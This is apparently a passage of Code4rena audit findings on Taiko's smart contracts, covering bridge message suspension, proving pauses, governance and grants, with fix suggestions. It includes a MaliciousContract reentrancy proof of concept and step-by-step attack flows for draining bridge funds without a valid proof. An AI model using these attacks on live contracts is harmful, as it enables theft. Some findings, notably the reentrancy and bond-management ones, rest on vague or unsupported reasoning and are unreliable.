            revert B_NON_RETRIABLE();
        }
        if (_invokeMessageCall(_message, msgHash, gasleft())) {
            _updateMessageStatus(msgHash, Status.DONE);
        } else if (_isLastAttempt) {
            _updateMessageStatus(msgHash, Status.FAILED);
        }
        emit MessageRetried(msgHash);
    }

The impact can be significant: if the bridge watchdog manages to catch a suspicious message in RETRIABLE status and suspends it, the malicious user can still retry it and execute it.

Tools Used

Manual Review

Recommended Mitigation Steps

Inside retryMessage, check whether the receivedAt value is set to type(uint64).max. If it is, revert (see the sketch below).
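
A minimal sketch of the check, to be placed near the top of retryMessage(); the B_MESSAGE_SUSPENDED error is a hypothetical addition:

bytes32 msgHash = hashMessage(_message);

// A suspended message has receivedAt pinned to the maximum value.
if (proofReceipt[msgHash].receivedAt == type(uint64).max) {
    revert B_MESSAGE_SUSPENDED(); // hypothetical error
}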

Assessed type

Context

Provable blocks can not be proved

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/L1/TaikoL1.sol#L111-L114

Vulnerability details

Description

In TaikoL1.sol, the owner or an address assigned the name "chain_pauser" can pause proving by calling pauseProving():

    function pauseProving(bool _pause) external {
        _authorizePause(msg.sender);
        LibProving.pauseProving(state, _pause);
    }

This halts the following two functions:

    function proveBlock(
        uint64 _blockId,
        bytes calldata _input
    )
        external
        nonReentrant
        whenNotPaused
->      whenProvingNotPaused
    {
	//..
	}

    function verifyBlocks(uint64 _maxBlocksToVerify)
        external
        nonReentrant
        whenNotPaused
->      whenProvingNotPaused
    {
	//..
	}

However, this can lead to cases where provable blocks won't be able to be proven anymore.

Proof of Concept

We will use block.timestamp in days, since the instance expiry of an SGX instance is notated in days:

    uint64 public constant INSTANCE_EXPIRY = 180 days;

Assume:

  • current block.timestamp = 179 days
  • _blockId == 10 has validSince set to 0; it will expire at 0 + INSTANCE_EXPIRY = 180 days.
  • Proving gets paused at 179 days by the owner.
    • It is currently impossible to prove any block (including _blockId == 10) due to the whenProvingNotPaused modifier.
  • Alice tries to prove _blockId == 10 but can't due to the modifier.
  • At 181 days the proving will be unpaused.
  • Alice can call proveBlock, but the proof will fail because of this if-statement:
    function _isInstanceValid(uint256 id, address instance) private view returns (bool) {
        if (instance == address(0)) return false;
        if (instance != instances[id].addr) return false;
->      return instances[id].validSince <= block.timestamp
            && block.timestamp <= instances[id].validSince + INSTANCE_EXPIRY;
    }

If Alice proposes a proof and Bob sees that this proof is not valid and wants to contest that block at 179 days, he won't be able to since proving has been paused. After it has been unpaused, the INSTANCE_EXPIRY will be over, and Bob won't be able to contest Alice's proof, rendering the contestation mechanism unusable in this case.

Tools Used

Manual Review

Recommended Mitigation Steps

Take a snapshot of block.timestamp when proving is paused and another when it is unpaused, and add the difference to INSTANCE_EXPIRY (see the sketch below).
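
A minimal sketch of one way to do this; the state variables and hook below are hypothetical additions, not existing code:

uint64 public provingPausedAt;       // timestamp of the latest pause, 0 while unpaused
uint64 public totalProvingPausedFor; // cumulative paused duration

function _trackProvingPause(bool _pause) internal {
    if (_pause) {
        provingPausedAt = uint64(block.timestamp);
    } else if (provingPausedAt != 0) {
        totalProvingPausedFor += uint64(block.timestamp) - provingPausedAt;
        provingPausedAt = 0;
    }
}

// In _isInstanceValid(), extend the expiry window by the paused time:
// block.timestamp <= instances[id].validSince + INSTANCE_EXPIRY + totalProvingPausedFor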

Assessed type

Context

QA Report

See the markdown file with the details of this report here.

Lack of Verification for Destination Chain Header Hash in proveSignalReceived Function

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/bridge/Bridge.sol#L577-L593
https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/signal/SignalService.sol#L83-L134

Vulnerability details

Impact

The lack of verification for the header hash on the destination chain height in the proveSignalReceived function could lead to a scenario where the proof data is valid, but the signal was not actually received on the destination chain as claimed. This could result in incorrect verification of cross-chain communication, leading to erroneous conclusions about the state of the system.

Proof of Concept

The proveSignalReceived function in the SignalService contract is designed to validate the integrity of proof data provided as input, confirming that a signal was received correctly on the destination chain. According to the documentation, this function is supposed to retrieve the header hash on the destination chain corresponding to the specified header height in the proof and then compare it against the hash provided in the proof. However, within the contract's implementation, this crucial step of verifying the header hash on the destination chain is not enforced.

While the documentation outlines the intended behavior of the proveSignalReceived function, the absence of code within the contract to enforce this verification represents a vulnerability. Without this verification step, there's no guarantee that the signal was actually received on the destination chain, even if the proof data is valid. As a result, the integrity and correctness of cross-chain communication verification are compromised.

Tools Used

Manual

Recommended Mitigation Steps

Update the proveSignalReceived function to include the necessary verification step for the header hash on the destination chain.

Assessed type

Context

Unchecked loop increments not needed in Solidity `>= v0.8.22`

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/thirdparty/optimism/trie/MerkleTrie.sol#L210-L212
https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/L1/libs/LibDepositing.sol#L103-L104

Vulnerability details

Impact

The new optimization in v0.8.22 removes the need for manual unchecked increment patterns in for-loop bodies, such as wrapping ++i in an unchecked block.

Proof of Concept

Solidity 0.8.22 introduces an overflow check optimization that automatically generates an unchecked arithmetic increment of the counter of for loops.

Tools Used

manual

Recommended Mitigation Steps

Do not use manual unchecked ++i increment patterns when compiling with Solidity >= 0.8.22; let the compiler generate the unchecked increment (see the sketch below).
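
A generic diff-style sketch of the recommendation (the loop bodies in the referenced files are not reproduced here):

-   for (uint256 i; i < length;) {
-       // ... loop body ...
-       unchecked { ++i; }
-   }
+   // Solidity >= 0.8.22 already skips the overflow check on the counter.
+   for (uint256 i; i < length; ++i) {
+       // ... loop body ...
+   }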

Assessed type

Other

Unbounded loop in ERC721Airdrop contract may cause the claim() function to fail

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/b6885955903c4ec6a0d72ebb79b124c6d0a1002b/packages/protocol/contracts/team/airdrop/ERC721Airdrop.sol#L47

Vulnerability details

Summary

The claim() function iterates over the tokenIds array using a for loop, transferring each token from the vault address to the user address. This is done using the safeTransferFrom() function.

However, there are no bounds on the number of tokens claimable in the claim() function, and gas requirements can change, or the provided tokens may consume a lot of gas during their claiming process.

Proof of Concept

    function claim(
        address user,
        uint256[] calldata tokenIds,
        bytes32[] calldata proof
    )
        external
        nonReentrant
    {
        // Check if this can be claimed
        _verifyClaim(abi.encode(user, tokenIds), proof);


        // Transfer the tokens
        for (uint256 i; i < tokenIds.length; ++i) { // @audit unbounded loop
            IERC721(token).safeTransferFrom(vault, user, tokenIds[i]);
        }
    }

There is no upper bound on the number of assets being transferred in this loop. With a large enough tokenIds array, the function will iterate through the whole length of the array retrieving each token, and in the event that the token being retrieved is located at the very end of the array, the function may eventually run out of gas and revert.

Impact

As a result of this, the user of the tokens will be unable to get the assets they are owed.

Tools Used

Manual Review

Recommended Mitigation Steps

Have an upper bound on the number of assets, or allow them to be transferred out one at a time, if necessary (see the sketch below).
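
A minimal sketch of the first option, bounding the claim size; the constant, its value, and the error name are assumptions for illustration:

uint256 public constant MAX_TOKENS_PER_CLAIM = 50; // hypothetical bound

function claim(
    address user,
    uint256[] calldata tokenIds,
    bytes32[] calldata proof
)
    external
    nonReentrant
{
    // Reject oversized claims up front so a single call cannot exceed the block gas limit.
    if (tokenIds.length > MAX_TOKENS_PER_CLAIM) revert CLAIM_TOO_LARGE(); // hypothetical error

    // Check if this can be claimed
    _verifyClaim(abi.encode(user, tokenIds), proof);

    // Transfer the tokens
    for (uint256 i; i < tokenIds.length; ++i) {
        IERC721(token).safeTransferFrom(vault, user, tokenIds[i]);
    }
}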

Assessed type

DoS

Agreements & Disclosures

Agreements

If you are a C4 Certified Contributor by commenting or interacting with this repo prior to public release of the contest report, you agree that you have read the Certified Warden docs and agree to be bound by:

To signal your agreement to these terms, add a 👍 emoji to this issue.

Code4rena staff reserves the right to disqualify anyone from this role and similar future opportunities who is unable to participate within the above guidelines.

Disclosures

Sponsors may elect to add team members and contractors to assist in sponsor review and triage. All sponsor representatives added to the repo should comment on this issue to identify themselves.

To ensure contest integrity, the following potential conflicts of interest should also be disclosed with a comment in this issue:

  1. any sponsor staff or sponsor contractors who are also participating as wardens
  2. any wardens hired to assist with sponsor review (and thus presenting sponsor viewpoint on findings)
  3. any wardens who have a relationship with a judge that would typically fall in the category of potential conflict of interest (family, employer, business partner, etc)
  4. any other case where someone might reasonably infer a possible conflict of interest.

Bridge::suspendMessages() does not check the status of the message before marking as suspended

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/bridge/Bridge.sol#L82-L95

Vulnerability details

Impact

Messages over the bridge move from one status to another based on their current stage of processing.

When marking a message as suspended, the logic does not check the current status of the message. Messages that are DONE, FAILED, or RECALLED should not be suspendable, as those messages have reached their end state.

     enum Status {
        NEW,
        RETRIABLE,
        DONE,
        FAILED,
        RECALLED
    }

Proof of Concept

The logic updates the receivedAt timestamp for msgHash without evaluating the status of the message at the time suspendMessages is called.

    function suspendMessages(
        bytes32[] calldata _msgHashes,
        bool _suspend
    )
        external
        onlyFromOwnerOrNamed("bridge_watchdog")
    {
        uint64 _timestamp = _suspend ? type(uint64).max : uint64(block.timestamp);
        for (uint256 i; i < _msgHashes.length; ++i) {
            bytes32 msgHash = _msgHashes[i];
            proofReceipt[msgHash].receivedAt = _timestamp;
            emit MessageSuspended(msgHash, _suspend);
        }
    }

Tools Used

Manual Review

Recommended Mitigation Steps

Revise the logic to check the status of the message; only messages that have not yet reached a final state should be considered for suspension.

Messages that are FAILED, RECALLED, or DONE should not be marked for suspension. A sketch of the check is shown below.
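
A minimal sketch of the suggested guard inside the suspendMessages() loop; B_INVALID_STATUS is reused from banAddress() shown above, and whether to revert or silently skip is a design choice:

for (uint256 i; i < _msgHashes.length; ++i) {
    bytes32 msgHash = _msgHashes[i];
    Status status = messageStatus[msgHash];

    // Do not suspend messages that have already reached a terminal state.
    if (status == Status.DONE || status == Status.FAILED || status == Status.RECALLED) {
        revert B_INVALID_STATUS();
    }

    proofReceipt[msgHash].receivedAt = _timestamp;
    emit MessageSuspended(msgHash, _suspend);
}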

Assessed type

Other

Potential Access Control Vulnerability in Bond Management during Proof Contestation and Tier Transitions

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/L1/libs/LibProving.sol#L207
https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/L1/libs/LibProving.sol#L350-L398

Vulnerability details

Impact

The identified vulnerability within LibProving.sol presents a medium-severity risk, primarily affecting the integrity and fairness of the proof contestation process and tier transitions. Key impacts include:

  • Integrity Risk: Potential manipulation of proof submissions could compromise the validation process's fairness, granting unfair advantages in block contestations.

  • Bond Mismanagement: Inadequate access control might allow unauthorized bond manipulation, disturbing the equitable management of prover collateral without direct financial theft.

  • Operational Disruption: Exploitation could disrupt protocol operations, affecting user confidence and participation due to unjust contestations or proof overrides.

Despite limited direct financial risk, the vulnerability's implications for process integrity and trust warrant its classification as medium severity, necessitating prompt remediation to uphold protocol standards.

Proof of Concept

Proof of Concept for Medium-Severity Vulnerability in LibProving.sol

Scenario: Bob aims to exploit a flaw in the bond management logic during proof contestation against Alice, who has submitted a valid high-tier proof.

Key Code Interaction:

  • Alice's Submission: Handled by proveBlock, where Alice's bond and tier are initially validated.
  • Bob's Exploit: Utilizes _overrideWithHigherProof (LibProving.sol#L350-L398), aiming at the inadequate tier and access control checks.

Exploitation Path:

  1. Initial Setup: Alice submits a high-tier proof, locking a significant validity bond as part of the submission process within the proveBlock function.

  2. Vulnerability Identification: Bob discovers a loophole in the _overrideWithHigherProof function that improperly handles tier validations and permissions during proof contestations.

  3. Malicious Action: Leveraging this flaw, Bob submits a new proof for the same block, targeting the same or slightly lower tier than Alice, to trigger the vulnerable bond management logic.

  4. Outcome: The system incorrectly processes Bob's submission, affecting Alice's bond and potentially her proof's status due to the flawed _overrideWithHigherProof logic. This results in either unjust bond reallocation or contestation, undermining the fairness and integrity of the proof validation process.

Recommended Mitigation Steps

Strengthen validation within _overrideWithHigherProof to ensure strict tier and authorization verification.

Assessed type

Access Control

suspendMessages() sets incorrect `receivedAt` timestamp which enables user to bypass `_proof`

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/main/packages/protocol/contracts/bridge/Bridge.sol#L89-L92

Vulnerability details

Summary & Impact

Even for unproven messages, the value of receivedAt can be set to a non-zero value inside suspendMessages() due to incomplete validation.

Whenever a message is unsuspended, the protocol does not check its previous proven/unproven status. So even if the message is unproven and receivedAt is supposed to be zero, the unsuspension sets it to block.timestamp. This practically acts as marking the message as proven, thus enabling a user to bypass important checks and:

  • perform the function calls processMessage() and recallMessage() without a valid _proof.
  • process a message even when its _proveSignalReceived = false.
  • get tokens/ether credited without actually proving it.
  • recall the message & get back ether even though the message never failed.

Details

Consider the following flow of events:

  • Alice sends a message.
  • Owner calls suspendMessages() to suspend Alice's message i.e. _suspend = true.
  • Soon after, owner calls suspendMessages() to un-suspend Alice's message i.e. _suspend = false.
    • Note that owner may even directly un-suspend the message, even though it was never in a suspended state initially (basically skipping step-2) as there is no check which ensures that only a suspended message is allowed to be unsuspended. But that would be quite illogical to do, so we've assumed a valid flow of events.
  • Alice's message, which had not yet been proven and still had receivedAt = 0, is now incorrectly assigned receivedAt = block.timestamp on L92.
  • Two attack vectors can now be carried out:
    • Attack Vector - 1:

      • User now calls processMessage() with an invalid _proof.
      • The if condition on L235 is bypassed since the message is incorrectly considered 'proven' by the protocol on L231. Hence it is never checked on L236 if the message signal was really received.
      • Funds are drained on L294-L300.
    • Attack Vector - 2:

      • User now calls recallMessage() with an invalid _proof.
      • The if condition on L171 is bypassed since the message is incorrectly considered 'proven' by the protocol on L169. Hence it is never checked on L179 if the message really failed.
      • Alice receives her ether back either on L199 or on L206.
      • There's an additional griefing attack vector possible here:
        • A griefer can call recallMessage() (even front-running an authentic processMessage() by the message owner) at timestamp = invocationDelay + receivedAt and cause the message status to be changed to RECALLED, thus disallowing any future chances of a processMessage() call. Note that the griefer need not provide a valid _proof now since the check on L179 does not ever happen.

Relevant code snippets:
  File: protocol/contracts/bridge/Bridge.sol

  155:              function recallMessage(
  156:                  Message calldata _message,
  157:                  bytes calldata _proof
  158:              )
  159:                  external
  160:                  nonReentrant
  161:                  whenNotPaused
  162:                  sameChain(_message.srcChainId)
  163:              {
  164:                  bytes32 msgHash = hashMessage(_message);
  165:
  166:                  if (messageStatus[msgHash] != Status.NEW) revert B_STATUS_MISMATCH();
  167:
  168:                  uint64 receivedAt = proofReceipt[msgHash].receivedAt;
  169: @--->            bool isMessageProven = receivedAt != 0;
  170:
  171: @--->            if (!isMessageProven) {
  172:                      address signalService = resolve("signal_service", false);
  173:
  174:                      if (!ISignalService(signalService).isSignalSent(address(this), msgHash)) {
  175:                          revert B_MESSAGE_NOT_SENT();
  176:                      }
  177:
  178:                      bytes32 failureSignal = signalForFailedMessage(msgHash);
  179: @--->                if (!_proveSignalReceived(signalService, failureSignal, _message.destChainId, _proof)) {
  180:                          revert B_NOT_FAILED();
  181:                      }
  182:
  183:                      receivedAt = uint64(block.timestamp);
  184:                      proofReceipt[msgHash].receivedAt = receivedAt;
  185:                  }
  186:
  187:                  (uint256 invocationDelay,) = getInvocationDelays();
  188:
  189:                  if (block.timestamp >= invocationDelay + receivedAt) {
  190:                      delete proofReceipt[msgHash];
  191:                      messageStatus[msgHash] = Status.RECALLED;
  192:
  193:                      // Execute the recall logic based on the contract's support for the
  194:                      // IRecallableSender interface
  195:                      if (_message.from.supportsInterface(type(IRecallableSender).interfaceId)) {
  196:                          _storeContext(msgHash, address(this), _message.srcChainId);
  197:
  198:                          // Perform recall
  199: @--->                    IRecallableSender(_message.from).onMessageRecalled{ value: _message.value }(
  200:                              _message, msgHash
  201:                          );
  202:
  203:                          // Must reset the context after the message call
  204:                          _resetContext();
  205:                      } else {
  206: @--->                    _message.srcOwner.sendEther(_message.value);
  207:                      }
  208:                      emit MessageRecalled(msgHash);
  209:                  } else if (!isMessageProven) {
  210:                      emit MessageReceived(msgHash, _message, true);
  211:                  } else {
  212:                      revert B_INVOCATION_TOO_EARLY();
  213:                  }
  214:              }
  215:
  216:              /// @inheritdoc IBridge
  217:              function processMessage(
  218:                  Message calldata _message,
  219:                  bytes calldata _proof
  220:              )
  221:                  external
  222:                  nonReentrant
  223:                  whenNotPaused
  224:                  sameChain(_message.destChainId)
  225:              {
  226:                  bytes32 msgHash = hashMessage(_message);
  227:                  if (messageStatus[msgHash] != Status.NEW) revert B_STATUS_MISMATCH();
  228:
  229:                  address signalService = resolve("signal_service", false);
  230:                  uint64 receivedAt = proofReceipt[msgHash].receivedAt;
  231: @--->            bool isMessageProven = receivedAt != 0;
  232:
  233:                  (uint256 invocationDelay, uint256 invocationExtraDelay) = getInvocationDelays();
  234:
  235: @--->            if (!isMessageProven) {
  236:                      if (!_proveSignalReceived(signalService, msgHash, _message.srcChainId, _proof)) {
  237:                          revert B_NOT_RECEIVED();
  238:                      }
  239:
  240:                      receivedAt = uint64(block.timestamp);
  241:
  242:                      if (invocationDelay != 0) {
  243: @--->                    proofReceipt[msgHash] = ProofReceipt({
  244:                              receivedAt: receivedAt,
  245:                              preferredExecutor: _message.gasLimit == 0 ? _message.destOwner : msg.sender
  246:                          });
  247:                      }
  248:                  }
  249:
  250:                  if (invocationDelay != 0 && msg.sender != proofReceipt[msgHash].preferredExecutor) {
  251:                      // If msg.sender is not the one that proved the message, then there
  252:                      // is an extra delay.
  253:                      unchecked {
  254:                          invocationDelay += invocationExtraDelay;
  255:                      }
  256:                  }
  257:
  258:                  if (block.timestamp >= invocationDelay + receivedAt) {
  259:                      // If the gas limit is set to zero, only the owner can process the message.
  260:                      if (_message.gasLimit == 0 && msg.sender != _message.destOwner) {
  261:                          revert B_PERMISSION_DENIED();
  262:                      }
  263:
  264:                      delete proofReceipt[msgHash];
  265:
  266:                      uint256 refundAmount;
  267:
  268:                      // Process message differently based on the target address
  269:                      if (
  270:                          _message.to == address(0) || _message.to == address(this)
  271:                              || _message.to == signalService || addressBanned[_message.to]
  272:                      ) {
  273:                          // Handle special addresses that don't require actual invocation but
  274:                          // mark message as DONE
  275:                          refundAmount = _message.value;
  276:                          _updateMessageStatus(msgHash, Status.DONE);
  277:                      } else {
  278:                          // Use the specified message gas limit if called by the owner, else
  279:                          // use remaining gas
  280:                          uint256 gasLimit = msg.sender == _message.destOwner ? gasleft() : _message.gasLimit;
  281:
  282:                          if (_invokeMessageCall(_message, msgHash, gasLimit)) {
  283:                              _updateMessageStatus(msgHash, Status.DONE);
  284:                          } else {
  285:                              _updateMessageStatus(msgHash, Status.RETRIABLE);
  286:                          }
  287:                      }
  288:
  289:                      // Determine the refund recipient
  290:                      address refundTo =
  291:                          _message.refundTo == address(0) ? _message.destOwner : _message.refundTo;
  292:
  293:                      // Refund the processing fee
  294:                      if (msg.sender == refundTo) {
  295:                          refundTo.sendEther(_message.fee + refundAmount);
  296:                      } else {
  297:                          // If sender is another address, reward it and refund the rest
  298:                          msg.sender.sendEther(_message.fee);
  299:                          refundTo.sendEther(refundAmount);
  300:                      }
  301:                      emit MessageExecuted(msgHash);
  302:                  } else if (!isMessageProven) {
  303:                      emit MessageReceived(msgHash, _message, false);
  304:                  } else {
  305:                      revert B_INVOCATION_TOO_EARLY();
  306:                  }
  307:              }
  File: protocol/contracts/bridge/Bridge.sol

  79:               /// @notice Suspend or unsuspend invocation for a list of messages.
  80:               /// @param _msgHashes The array of msgHashes to be suspended.
  81:               /// @param _suspend True if suspend, false if unsuspend.
  82:               function suspendMessages(
  83:                   bytes32[] calldata _msgHashes,
  84:                   bool _suspend
  85:               ) 
  86:                   external
  87:                   onlyFromOwnerOrNamed("bridge_watchdog")
  88:               {
  89:  @--->            uint64 _timestamp = _suspend ? type(uint64).max : uint64(block.timestamp);  
  90:                   for (uint256 i; i < _msgHashes.length; ++i) {
  91:                       bytes32 msgHash = _msgHashes[i];
  92:  @--->                proofReceipt[msgHash].receivedAt = _timestamp;
  93:                       emit MessageSuspended(msgHash, _suspend);
  94:                   }
  95:               }

Tools Used

Manual review

Recommended Mitigation Steps

Introduce a new boolean mapping isProven[msgHash] which stores whether the message was proven or not before being suspended/unsuspended.

    function suspendMessages(
        bytes32[] calldata _msgHashes,
        bool _suspend
    )
        external
        onlyFromOwnerOrNamed("bridge_watchdog")
    {
        uint64 _timestamp = _suspend ? type(uint64).max : uint64(block.timestamp);
        for (uint256 i; i < _msgHashes.length; ++i) {
            bytes32 msgHash = _msgHashes[i];
            proofReceipt[msgHash].receivedAt = _timestamp;
+           if (!isProven[msgHash] && !_suspend) proofReceipt[msgHash].receivedAt = 0;  // set it to zero if unsuspension of an unproven message is being done
            emit MessageSuspended(msgHash, _suspend);
        }
    }


    ...
    ...


    function recallMessage(
        Message calldata _message,
        bytes calldata _proof
    )
        external
        nonReentrant
        whenNotPaused
        sameChain(_message.srcChainId)
    {
        bytes32 msgHash = hashMessage(_message);

        if (messageStatus[msgHash] != Status.NEW) revert B_STATUS_MISMATCH();

        uint64 receivedAt = proofReceipt[msgHash].receivedAt;
        bool isMessageProven = receivedAt != 0;
+       if (receivedAt != type(uint64).max) isProven[msgHash] = isMessageProven;  // if not suspended, update `isProven`

        if (!isMessageProven) {
            address signalService = resolve("signal_service", false);


    ...
    ...


    function processMessage(
        Message calldata _message,
        bytes calldata _proof
    )
        external
        nonReentrant
        whenNotPaused
        sameChain(_message.destChainId)
    {
        bytes32 msgHash = hashMessage(_message);
        if (messageStatus[msgHash] != Status.NEW) revert B_STATUS_MISMATCH();

        address signalService = resolve("signal_service", false);
        uint64 receivedAt = proofReceipt[msgHash].receivedAt;
        bool isMessageProven = receivedAt != 0;
+       if (receivedAt != type(uint64).max) isProven[msgHash] = isMessageProven;  // if not suspended, update `isProven`

        (uint256 invocationDelay, uint256 invocationExtraDelay) = getInvocationDelays();

        if (!isMessageProven) {
            if (!_proveSignalReceived(signalService, msgHash, _message.srcChainId, _proof)) {

Assessed type

Invalid Validation

TaikoGovernor::propose does not check for threshold votes before submitting a proposal

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/L1/gov/TaikoGovernor.sol#L48-L59
https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/L1/gov/TaikoGovernor.sol#L69-L86

Vulnerability details

Impact

In order to submit a proposal to TaikoGovernor, an account should hold a minimum number of votes as per the threshold set by the contract. Per the implementation, the proposer should hold 0.01% of the Taiko token supply at the time of submitting the proposal.

However, neither of the propose functions checks that msg.sender meets the vote threshold criteria.

Submitting a proposal is a privileged action and should be restricted to qualified accounts that have a stake in the protocol. Allowing anyone to submit a proposal opens the door to abuse by malicious parties.

Proof of Concept

The propose functions of TaikoGovernor do not validate the vote threshold before allowing submission of a proposal.

 function propose(
        address[] memory _targets,
        uint256[] memory _values,
        bytes[] memory _calldatas,
        string memory _description
    )
        public
        override(IGovernorUpgradeable, GovernorUpgradeable, GovernorCompatibilityBravoUpgradeable)
        returns (uint256)
    {
        return super.propose(_targets, _values, _calldatas, _description);
    }
 function propose(
        address[] memory _targets,
        uint256[] memory _values,
        string[] memory _signatures,
        bytes[] memory _calldatas,
        string memory _description
    )
        public
        virtual
        override(GovernorCompatibilityBravoUpgradeable)
        returns (uint256)
    {
        if (_signatures.length != _calldatas.length) revert TG_INVALID_SIGNATURES_LENGTH();

        return GovernorCompatibilityBravoUpgradeable.propose(
            _targets, _values, _signatures, _calldatas, _description
        );
    }

Tools Used

Manual review

Recommended Mitigation Steps

Add a validation condition to verify that msg.sender has the required votes to meet the threshold criteria before allowing submission of a proposal to the TaikoGovernor; a sketch is shown below.
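
A minimal sketch of one possible check (this assumes OpenZeppelin's getVotes() and proposalThreshold() are available on the governor; the TG_PROPOSER_BELOW_THRESHOLD error is hypothetical and not part of the existing codebase):

    function propose(
        address[] memory _targets,
        uint256[] memory _values,
        bytes[] memory _calldatas,
        string memory _description
    )
        public
        override(IGovernorUpgradeable, GovernorUpgradeable, GovernorCompatibilityBravoUpgradeable)
        returns (uint256)
    {
        // Require the proposer to hold at least the configured vote threshold
        if (getVotes(msg.sender, block.number - 1) < proposalThreshold()) {
            revert TG_PROPOSER_BELOW_THRESHOLD(); // hypothetical error
        }
        return super.propose(_targets, _values, _calldatas, _description);
    }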

Assessed type

Governance

TimelockTokenPool::grant() blocks additional grants if _recipient has grant balance

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/team/TimelockTokenPool.sol#L135-L144

Vulnerability details

Impact

Grants are intended to be given to recipients on a periodic basis, but the current validation logic in the grant() function will not allow a recipient to receive another grant until their existing grant amount is 0.

That means only one grant is possible unless the previous grant has been voided, resulting in the grant amount becoming 0. With the current implementation, a recipient's ability to receive a grant is effectively limited to a single time.

    if (recipients[_recipient].grant.amount != 0) revert ALREADY_GRANTED();

Proof of Concept

   function grant(address _recipient, Grant memory _grant) external onlyOwner {
        if (_recipient == address(0)) revert INVALID_PARAM();
        if (recipients[_recipient].grant.amount != 0) revert ALREADY_GRANTED();

        _validateGrant(_grant);

        totalAmountGranted += _grant.amount;
        recipients[_recipient].grant = _grant;
        emit Granted(_recipient, _grant);
    }

Tools Used

Manual review

Recommended Mitigation Steps

If the recipient is meant to receive grants on a regular basis, then the above condition, which reverts when the grant amount is non-zero, should be removed.

Also, the grant update for the recipient should sum the previous amount with the new grant; otherwise the recipient will lose the previously granted amount (see the sketch after the snippet below).

  recipients[_recipient].grant = _grant;
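
A minimal sketch of the accumulating approach (this assumes grants with an existing balance share the same vesting parameters; merging grants with different schedules would need additional handling):

    function grant(address _recipient, Grant memory _grant) external onlyOwner {
        if (_recipient == address(0)) revert INVALID_PARAM();

        _validateGrant(_grant);

        totalAmountGranted += _grant.amount;
        if (recipients[_recipient].grant.amount == 0) {
            recipients[_recipient].grant = _grant;
        } else {
            // Accumulate instead of overwriting, so the previous grant is not lost
            recipients[_recipient].grant.amount += _grant.amount;
        }
        emit Granted(_recipient, _grant);
    }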

Assessed type

Timing

Double Deposit Exploit: Reentrancy Vulnerability in TaikoL1.sol

Lines of code

https://github.com/code-423n4/2024-03-taiko/blob/a30b5b6afd121e4de8ceff7165a2091e62194992/packages/protocol/contracts/L1/TaikoL1.sol#L117-L121

Vulnerability details

Impact

The impact of the reentrancy exploit in the depositEtherToL2 function of TaikoL1.sol is significant and can lead to financial loss for users and the contract itself. Here's a detailed breakdown of the potential consequences:

  1. Double Deposits: The most immediate impact is that an attacker could potentially double deposits. This means that if an attacker sends Ether to the MaliciousContract and calls the attack function, the fallback function will be triggered, which in turn calls the depositEtherToL2 function of TaikoL1. Since the fallback function is reentrant, it can call depositEtherToL2 again before the first call has finished executing, leading to the Ether being deposited twice.

  2. Loss of Funds: Users who interact with the TaikoL1 contract by depositing Ether could lose their funds due to the double deposit exploit. The contract's balance would increase due to the double deposit, but the user's balance within the contract would not reflect the actual amount of Ether they intended to deposit.

  3. Contract Vulnerability: The contract's vulnerability to reentrancy attacks could be exploited by malicious actors to drain the contract's funds. If the contract's balance is manipulated due to the double deposit exploit, an attacker could potentially withdraw more Ether than they should be able to.

Proof of Concept

To demonstrate a Proof of Concept (POC) for the reentrancy vulnerability in the depositEtherToL2 function of TaikoL1.sol, we'll create a malicious contract that exploits this vulnerability. This POC will illustrate how an attacker could potentially double deposits by calling the depositEtherToL2 function in the fallback function of their malicious contract.

Step 1: Create the Malicious Contract

First, we'll create a malicious contract that will exploit the reentrancy vulnerability in the depositEtherToL2 function. This contract will have a fallback function that calls the depositEtherToL2 function of TaikoL1.

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.24;

import "./TaikoL1.sol";

contract MaliciousContract {
    TaikoL1 public taikoL1;
    address payable public attacker;

    constructor(TaikoL1 _taikoL1) {
        taikoL1 = _taikoL1;
        attacker = payable(msg.sender);
    }

    // Fallback function to exploit reentrancy
    fallback() external payable {
        if (address(taikoL1).balance >= msg.value) {
            taikoL1.depositEtherToL2{value: msg.value}(attacker);
        }
    }

    // Function to initiate the attack
    function attack() external payable {
        require(msg.value > 0, "Must send some Ether");
        taikoL1.depositEtherToL2{value: msg.value}(address(this));
    }

    // Function to withdraw the stolen Ether
    function withdraw() external {
        require(msg.sender == attacker, "Only the attacker can withdraw");
        payable(attacker).transfer(address(this).balance);
    }
}

Step 2: Deploy and Execute the Attack

  1. Deploy TaikoL1 and MaliciousContract: Deploy the TaikoL1 contract and the MaliciousContract with the address of the deployed TaikoL1 contract as a constructor argument.

  2. Initiate the Attack: Call the attack function of the MaliciousContract with some Ether. This will trigger the depositEtherToL2 function of TaikoL1, which in turn will call the fallback function of the MaliciousContract.

  3. Observe the Reentrancy: The fallback function of the MaliciousContract will again call the depositEtherToL2 function of TaikoL1, potentially leading to double deposits.

Recommended Mitigation Steps

To mitigate this reentrancy vulnerability, the depositEtherToL2 function in TaikoL1.sol should use the Checks-Effects-Interactions pattern and consider using the reentrancyGuard modifier from OpenZeppelin's ReentrancyGuard contract. This ensures that all state changes are made before calling external contracts, preventing reentrancy attacks.

import "@openzeppelin/contracts/security/ReentrancyGuard.sol";

contract TaikoL1 is EssentialContract, ITaikoL1, TaikoEvents, TaikoErrors, ReentrancyGuard {
    // Existing code...

